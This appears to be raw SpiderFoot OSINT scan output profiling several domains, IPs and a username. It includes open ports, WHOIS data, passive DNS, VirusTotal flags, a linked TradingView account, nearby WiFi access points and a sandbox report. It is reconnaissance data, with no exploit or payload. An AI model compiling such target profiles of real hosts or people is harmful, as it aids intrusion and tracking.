"autonomous_system_updated_at": "2022-12-18T00:20:33.438254Z", "location": {"province": "North Holland", "city": "Amsterdam", "country": "Netherlands", "coordinates": {"latitude": 52.3759, "longitude": 4.8975}, "registered_country": "United States", "registered_country_code": "US", "postal_code": "1012", "country_code": "NL", "timezone": "Europe/Amsterdam", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "137.117.0.0/16", "country_code": "US", "asn": 8075, "name": "MICROSOFT-CORP-MSN-AS-BLOCK", "description": "MICROSOFT-CORP-MSN-AS-BLOCK"}} 
137.117.157.128 2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None tradingview (Category: finance) https://www.tradingview.com/u/rasputain/ rasputain 2022-12-18 00:09:53 Co-Hosted Site No HackerTarget 0 0 2 0 None brilliantposts.com 172.67.147.230 2022-12-18 00:21:30 Open TCP Port No Censys 0 0 2 0 None 172.67.190.129:8880 172.67.190.129 2022-12-18 00:05:38 Internet Name - Unresolved No Certificate Transparency 0 0 1 0 None www.plague.fun plague.fun 2022-12-18 00:25:45 Affiliate - Domain Name No DNS Resolver 2 0 5 0 None dominiando.us ns.dominiando.us 2022-12-18 00:21:23 Netblock IPv6 Membership No Censys 0 0 2 0 None 2606:4700:3032::/48 2606:4700:3032::ac43:be81 2022-12-18 00:21:17 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77b0cd4c299e2d49-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.96.1 2022-12-18 00:21:37 Open TCP Port No Censys 0 0 2 0 None 20.226.83.185:80 20.226.83.185 2022-12-18 00:34:26 Malicious Affiliate IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [81.88.52.230] https://www.virustotal.com/en/ip-address/81.88.52.230/information/ 81.88.52.230 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:80 172.67.169.215 2022-12-18 00:02:54 Domain Whois No Whois 8 0 1 0 None Domain Name: ZEROTWO-BEST-WAIFU.ONLINE Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: whois.enom.com Registrar URL: https://www.enom.com/ Updated Date: 2022-01-11T15:03:40.0Z Creation Date: 2021-12-25T22:42:25.0Z Registry Expiry Date: 2022-12-25T23:59:59.0Z Registrar: eNom, Inc. 
Registrar IANA ID: 48 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Data Protected Registrant State/Province: WA Registrant Country: US Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS1.AMENWORLD.COM Name Server: NS2.AMENWORLD.COM DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: domainabuse@tucows.com Registrar Abuse Contact Phone: +49.2283296859 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. 
Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. Domain Name: zerotwo-best-waifu.online Registry Domain ID: D266274377-CNIC Registrar WHOIS Server: WHOIS.ENOM.COM Registrar URL: WWW.ENOM.COM Updated Date: 2022-01-11T15:03:40.00Z Creation Date: 2021-12-25T22:42:00.00Z Registrar Registration Expiration Date: 2022-12-25T23:59:59.00Z Registrar: ENOM, INC. Registrar IANA ID: 48 Domain Status: ok https://www.icann.org/epp#ok Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Paris Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: FR Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Email: https://tieredaccess.com/contact/0b66922f-87a6-44e9-a979-1158d3dacd13 Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Email: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Email: REDACTED FOR PRIVACY Name Server: NS1.AMENWORLD.COM Name Server: 
NS2.AMENWORLD.COM DNSSEC: unsigned Registrar Abuse Contact Email: ABUSE@ENOM.COM Registrar Abuse Contact Phone: +1.4259744689 URL of the ICANN WHOIS Data Problem Reporting System: HTTP://WDPRS.INTERNIC.NET/ >>> Last update of WHOIS database: 2022-12-18T00:02:53.00Z <<< For more information on Whois status codes, please visit https://icann.org/epp The data in this whois database is provided to you for information purposes only, that is, to assist you in obtaining information about or related to a domain name registration record. We make this information available "as is," and do not guarantee its accuracy. By submitting a whois query, you agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. 
Version 6.3 4/3/2002 zerotwo-best-waifu.online 2022-12-18 00:24:59 Malicious IP Address Yes VirusTotal 0 0 2 0 None VirusTotal [172.67.169.215] https://www.virustotal.com/en/ip-address/172.67.169.215/information/ 172.67.169.215 2022-12-18 00:31:45 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.online plague.fun 2022-12-18 00:21:44 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77b2ce246b792a2d-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3031::6815:7b3 2022-12-18 00:04:28 Raw DNS Records No DNS Raw Records 0 0 1 0 None zerotwo-best-waifu.online. 900 IN NS ns2.amenworld.com. zerotwo-best-waifu.online. 900 IN NS ns1.amenworld.com. 
zerotwo-best-waifu.online 2022-12-18 00:21:34 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77a80b748c0503fc-ORD Content-Encoding: gzip 104.21.19.243 2022-12-18 00:22:11 Raw Data from RIRs No Censys 0 0 2 0 None {"last_updated_at": "2022-07-16T13:05:15.855Z", "ip": "81.88.52.232", "location_updated_at": "2022-12-18T00:22:08.060556Z", "autonomous_system_updated_at": "2022-12-18T00:22:08.060556Z", "location": {"country": "Italy", "coordinates": {"latitude": 43.1479, "longitude": 12.1097}, "registered_country": "Italy", "registered_country_code": "IT", "postal_code": "", "country_code": "IT", "timezone": "Europe/Rome", "continent": "Europe"}, "services": [], "autonomous_system": {"bgp_prefix": "81.88.48.0/20", "country_code": "IT", "asn": 39729, "name": "REGISTER-AS", "description": "REGISTER-AS"}} 81.88.52.232 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None InterSolar (Net ID: 00:00:00:00:83:B5) 37.7803446,-122.3906132 2022-12-18 00:25:06 Affiliate - IP Address No DNS Look-aside 1 0 3 0 None 81.88.48.111 81.88.48.101 2022-12-18 00:03:33 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3236.webapps.net 81.88.52.236 2022-12-18 00:02:50 IP Address No Mnemonic PassiveDNS 13 0 1 0 None 20.226.56.97 misogyny.wtf 2022-12-18 00:12:19 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'ON', u'country_tld': u'.ca', u'ip': u'172.67.190.129', u'currency_name': u'Dollar', u'currency': u'CAD', u'country_population': 37058856, u'country_code': u'CA', u'timezone': u'America/Toronto', u'city': u'Toronto', u'network': u'172.67.128.0/17', u'languages': u'en-CA,fr-CA,iu', u'version': u'IPv4', 
u'latitude': 43.6227, u'in_eu': False, u'utc_offset': u'-0500', u'continent_code': u'NA', u'country_name': u'Canada', u'country_capital': u'Ottawa', u'org': u'CLOUDFLARENET', u'postal': u'M5J', u'asn': u'AS13335', u'country': u'CA', u'region': u'Ontario', u'longitude': -79.3892, u'country_calling_code': u'+1', u'country_area': 9984670.0, u'country_code_iso3': u'CAN'} 172.67.190.129 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 77 0 1 0 None 188.114.96.1 plague.fun 2022-12-18 00:27:23 Physical Location No MetaDefender 0 0 2 0 None Medellin, Colombia 188.114.97.9 2022-12-18 00:03:10 SSL Certificate Host Mismatch Yes SSL Certificate Analyzer 0 0 1 0 None *.webapps.net, webapps.net zerotwo-best-waifu.online 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77aeec553a461419-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 188.114.97.1 2022-12-18 00:13:04 Search Engines Web Content No DuckDuckGo 0 0 3 0 None { "Abstract" : "Wanadoo was the Internet service provider division of Orange S.A. It operated in France, Spain, the United Kingdom, Belgium, the Netherlands, Tunisia, Algeria, Morocco, Senegal, Mauritius, Madagascar, Lebanon and Jordan. It ceased to operate as a worldwide brand on 1 June 2006, when it was rebranded as Orange. 
The origin of the name Wanadoo is subject to some controversy, as some maintain it came about in the late 1990s when many internet companies chose to compete by creating \"Yahoo! \"-sounding names. However, it might be that the name Wanadoo first appeared in an internal project at France T\u00e9l\u00e9com, much in line with a number of other such projects such as France Animation until 2003, Intranoo, Tatoo, Netatoo and @noo. Wanadoo was floated on the stock market on 18 July 2000. In 2000, Wanadoo also took over the major British ISP Freeserve, which had previously been part of the Dixons Group.", "AbstractSource" : "Wikipedia", "AbstractText" : "Wanadoo was the Internet service provider division of Orange S.A. It operated in France, Spain, the United Kingdom, Belgium, the Netherlands, Tunisia, Algeria, Morocco, Senegal, Mauritius, Madagascar, Lebanon and Jordan. It ceased to operate as a worldwide brand on 1 June 2006, when it was rebranded as Orange. The origin of the name Wanadoo is subject to some controversy, as some maintain it came about in the late 1990s when many internet companies chose to compete by creating \"Yahoo! \"-sounding names. However, it might be that the name Wanadoo first appeared in an internal project at France T\u00e9l\u00e9com, much in line with a number of other such projects such as France Animation until 2003, Intranoo, Tatoo, Netatoo and @noo. Wanadoo was floated on the stock market on 18 July 2000. 
In 2000, Wanadoo also took over the major British ISP Freeserve, which had previously been part of the Dixons Group.", "AbstractURL" : "https://en.wikipedia.org/wiki/Wanadoo", "Answer" : "", "AnswerType" : "", "Definition" : "", "DefinitionSource" : "", "DefinitionURL" : "", "Entity" : "company", "Heading" : "Wanadoo", "Image" : "/i/24eab621.png", "ImageHeight" : 37, "ImageIsLogo" : 0, "ImageWidth" : 150, "Infobox" : { "content" : [ { "data_type" : "string", "label" : "Industry", "sort_order" : "1000", "value" : "ISP provider", "wiki_order" : 0 }, { "data_type" : "string", "label" : "Fate", "sort_order" : "1001", "value" : "Rebranded to Orange on 1 June 2006", "wiki_order" : 1 }, { "data_type" : "string", "label" : "Owner", "sort_order" : "1002", "value" : "Orange S.A.", "wiki_order" : 2 }, { "data_type" : "string", "label" : "Website", "sort_order" : "1003", "value" : "www.orange.fr", "wiki_order" : 3 }, { "data_type" : "instance", "label" : "Instance of", "value" : { "entity-type" : "item", "id" : "Q4830453", "numeric-id" : 4830453 }, "wiki_order" : "207" }, { "data_type" : "instance_2", "label" : "Instance of", "value" : { "entity-type" : "item", "id" : "Q6881511", "numeric-id" : 6881511 }, "wiki_order" : "207" }, { "data_type" : "official_website", "label" : "Official Website", "value" : "http://www.orange.fr", "wiki_order" : "208" } ], "meta" : [ { "data_type" : "string", "label" : "article_title", "value" : "Wanadoo" }, { "data_type" : "string", "label" : "template_name", "value" : "infobox company" }, { "data_type" : "string", "label" : "formatting_rules", "value" : "company" } ] }, "Redirect" : "", "RelatedTopics" : [ { "FirstURL" : "https://duckduckgo.com/c/Internet_service_providers_of_France", "Icon" : { "Height" : "", "URL" : "", "Width" : "" }, "Result" : "Internet service providers of France", "Text" : "Internet service providers of France" }, { "FirstURL" : "https://duckduckgo.com/c/Orange_S.A.", "Icon" : { "Height" : "", "URL" : "", "Width" : "" }, 
"Result" : "Orange S.A.", "Text" : "Orange S.A." }, { "FirstURL" : "https://duckduckgo.com/c/Companies_formerly_listed_on_the_London_Stock_Exchange", "Icon" : { "Height" : "", "URL" : "", "Width" : "" }, "Result" : "Companies formerly listed on the London Stock Exchange", "Text" : "Companies formerly listed on the London Stock Exchange" } ], "Results" : [ { "FirstURL" : "https://www.orange.fr", "Icon" : { "Height" : 16, "URL" : "/i/orange.fr.ico", "Width" : 16 }, "Result" : "Official site", "Text" : "Official site" }, { "FirstURL" : "http://www.orange.fr", "Icon" : { "Height" : 16, "URL" : "/i/orange.fr.ico", "Width" : 16 }, "Result" : "Official site - Wanadoo", "Text" : "Official site - Wanadoo" } ], "Type" : "A", "meta" : { "attribution" : null, "blockgroup" : null, "created_date" : null, "description" : "Wikipedia", "designer" : null, "dev_date" : null, "dev_milestone" : "live", "developer" : [ { "name" : "DDG Team", "type" : "ddg", "url" : "http://www.duckduckhack.com" } ], "example_query" : "nikola tesla", "id" : "wikipedia_fathead", "is_stackexchange" : null, "js_callback_name" : "wikipedia", "live_date" : null, "maintainer" : { "github" : "duckduckgo" }, "name" : "Wikipedia", "perl_module" : "DDG::Fathead::Wikipedia", "producer" : null, "production_state" : "online", "repo" : "fathead", "signal_from" : "wikipedia_fathead", "src_domain" : "en.wikipedia.org", "src_id" : 1, "src_name" : "Wikipedia", "src_options" : { "directory" : "", "is_fanon" : 0, "is_mediawiki" : 1, "is_wikipedia" : 1, "language" : "en", "min_abstract_length" : "20", "skip_abstract" : 0, "skip_abstract_paren" : 0, "skip_end" : "0", "skip_icon" : 0, "skip_image_name" : 0, "skip_qr" : "", "source_skip" : "", "src_info" : "" }, "src_url" : null, "status" : "live", "tab" : "About", "topic" : [ "productivity" ], "unsafe" : 0 } } lfbn-nic-1-332-104.w90-116.abo.wanadoo.fr 2022-12-18 00:12:49 Raw Data from RIRs No ipapi.co 0 0 2 0 None {u'region_code': u'NH', u'country_tld': u'.nl', u'ip': 
u'188.114.97.9', u'currency_name': u'Euro', u'currency': u'EUR', u'country_population': 17231017, u'country_code': u'NL', u'timezone': u'Europe/Amsterdam', u'city': u'Amsterdam', u'network': u'188.114.96.0/22', u'languages': u'nl-NL,fy-NL', u'version': u'IPv4', u'latitude': 52.3759, u'in_eu': True, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'Netherlands', u'country_capital': u'Amsterdam', u'org': u'CLOUDFLARENET', u'postal': u'1012', u'asn': u'AS13335', u'country': u'NL', u'region': u'North Holland', u'longitude': 4.8975, u'country_calling_code': u'+31', u'country_area': 41526.0, u'country_code_iso3': u'NLD'} 188.114.97.9 2022-12-18 00:09:21 Open TCP Port No LeakIX 0 0 2 0 None 104.21.7.179:80 104.21.7.179 2022-12-18 00:22:07 Malicious Internet Name Yes Cleanbrowsing.org 0 1 2 0 None Blocked by Cleanbrowsing.org [autoconfig.zerotwo-best-waifu.online] autoconfig.zerotwo-best-waifu.online 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Brazil 4.228.83.86 2022-12-18 00:18:06 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.1:8080 188.114.97.0/24 2022-12-18 00:02:39 IP Address No SpiderFoot UI 14 0 0 0 None 40.113.112.131 plague.fun,misogyny.wtf,rasputain.fr,zerotwo-best-waifu.online,137.117.157.128,20.195.209.219,4.228.83.86,40.113.112.131,51.103.210.236,20.224.2.213 2022-12-18 00:04:24 Raw Data from RIRs No Hybrid Analysis 0 0 1 0 None [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 15, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://20.224.2.213/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"20.224.2.213:49742"'}, {u'category': u'General', u'origin': 
u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "Part-RU" as clean (type is "DOS executable (COM)")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4324:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:4324:120:WilError_01"\n "Local\\SM0:3208:304:WilStaging_02"\n "Local\\SM0:3208:120:WilError_01"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:4324:120:WilError_01"\n "Local\\SM0:4324:304:WilStaging_02"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\DBWinMutex"\n "DBWinMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3020:304:WilStaging_02"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-33', u'name': u'Drops executable files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4324_607486025\\Part-RU]- [targetUID: 00000000-00004324]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Asset Store\\assets.db\\000003.log]- [targetUID: 00000000-00004324]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.31\\Ruleset Data]- [targetUID: 00000000-00004324]\n "90765a85-28a0-4fa7-b3ad-27a06095474a.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\90765a85-28a0-4fa7-b3ad-27a06095474a.tmp]- [targetUID: 00000000-00002116]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00004324]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.json]- [targetUID: 00000000-00004324]\n "57d3fef7-7003-4f41-bd91-b9f4b45162dc.tmp" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\57d3fef7-7003-4f41-bd91-b9f4b45162dc.tmp]- [targetUID: 00000000-00004324]\n "21c677a6-7af7-4d14-b4e1-83980feecc50.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\21c677a6-7af7-4d14-b4e1-83980feecc50.tmp]- [targetUID: 00000000-00004324]\n "Part-RU" has type "DOS executable (COM)"- Location: [%TEMP%\\4324_607486025\\Part-RU]- [targetUID: 00000000-00004324]\n "crl-set" has type "data"- Location: [%TEMP%\\4324_6077116\\crl-set]- [targetUID: 00000000-00004324]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00000256]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\4324_1765292486\\edge_confirmation_page_validator.js]- [targetUID: 
00000000-00004324]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00004324]\n "Part-FR" has type "data"- Location: [%TEMP%\\4324_607486025\\Part-FR]- [targetUID: 00000000-00004324]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ZxcvbnData\\3.0.0.0\\manifest.fingerprint]- [targetUID: 00000000-00004324]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\4324_1134055185\\safety_tips.pb]- [targetUID: 00000000-00004324]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\4324_607486025\\Filtering Rules]- [targetUID: 00000000-00004324]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\4324_607486025\\LICENSE]- [targetUID: 00000000-00004324]\n "Part-NL" has type "PGP symmetric key encrypted data -"- Location: [%TEMP%\\4324_607486025\\Part-NL]- [targetUID: 00000000-00004324]\n "717e6579-f8b4-4a68-a10c-3da7c69a712b.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\717e6579-f8b4-4a68-a10c-3da7c69a712b.tmp]- [targetUID: 00000000-00004324]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://20.224.2.213/"\n Pattern match: "http://20.224.2.213"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/91 Antivirus vendors marked sample as malicious (0% 
detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\4324_1765292486\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00004324]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\4324_607486025\\adblock_snippet.js]- [targetUID: 00000000-00004324]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\4324_1765292486\\shopping_iframe_driver.js]- [targetUID: 00000000-00004324]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\4324_1765292486\\shoppingfre.js]- [targetUID: 00000000-00004324]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\4324_1765292486\\edge_driver.js]- [targetUID: 00000000-00004324]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\4324_1765292486\\auto_open_controller.js]- [targetUID: 00000000-00004324]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\4324_1765292486\\edge_tracking_page_validator.js]- [targetUID: 00000000-00004324]\n Dropped file: "product_page.js" - Location: [%TEMP%\\4324_1765292486\\product_page.js]- [targetUID: 00000000-00004324]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\4324_1765292486\\edge_checkout_page_validator.js]- [targetUID: 00000000-00004324]\n Dropped file: "shopping.js" - Location: [%TEMP%\\4324_1765292486\\shopping.js]- [targetUID: 00000000-00004324]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"Part-RU" has 
type "DOS executable (COM)"- Location: [%TEMP%\\4324_607486025\\Part-RU]- [targetUID: 00000000-00004324]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-1152268696\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\reports" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-1157860885\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\\attachments" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-1163368179\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-10605614793\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-11366423098\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\db2c4955-3bea-43fa-be55-7de371ad84ea" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00004324-00000BE4-27061915827\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\ 20.224.2.213 2022-12-18 00:12:23 Physical Location No ipapi.co 0 0 2 0 None Campinas, Sao Paulo, SP, Brazil, BR 20.226.83.185 2022-12-18 00:09:22 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.6:8443 188.114.96.0/24 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None WLAN (Net ID: 00:01:24:F0:97:C1) 
